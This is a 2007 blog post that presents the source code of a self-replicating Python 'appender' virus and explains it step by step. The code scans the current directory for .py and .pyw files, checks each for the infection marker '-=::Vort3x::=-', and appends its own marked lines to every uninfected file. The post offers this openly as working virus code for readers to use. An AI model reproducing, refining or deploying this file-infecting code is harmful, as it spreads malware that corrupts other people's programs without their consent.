Thursday, November 8, 2007

Python Appender Virus

Python Appender Virus
Here i will show you a small appender. Appenders are a type of standard file infection along with prepender and the lame overwriters (that no one really likes!) Damnit :p Appending means to write the virus code after the normal code, therefore, the virus is run after the hostcode.

Code:
Code:
import glob #!
from string import * #!
Files = glob.glob("*.py") + glob.glob("*.pyw") #!
for Files in Files: #!
vCode = open(__file__, 'r') #!
victim = open (Files, 'r') #!
readvictim = victim.read() #!
if find(readvictim, "-=::Vort3x::=-") == -1: #!
victim = open(Files, 'a') #!
for code in vCode.readlines(): #!
if ("#!") in code: #!
vCode.close() #!
mycode=(chr(10)+code) #!
victim.write(mycode) #!
Here is how it works:

Searched for files (py / pyw) in current directory
Looks inside those files to find the infection marker. Note: this virus has 2 markers, ill explain later
Finds its own code
Opens the uninfected files and writes its code to the end of the normal code.
Closes all open files.. finished!
Why it has 2 markers: Well, the ones you notice the most are the virus code markers, we use these to know what code to infect other files with. The virus will only copy the code that has "#!" at the end of each line, understand? there are other ways of doing this but blah it works Then we have the infection marker "-=::Vort3x::=-" this is so we can see if the file has already been infected. If we dont use any infection marker, bad things will happen!! Such as your virus re-appending to files. :O Then you end up with HUGE files, growing in size each time its executed!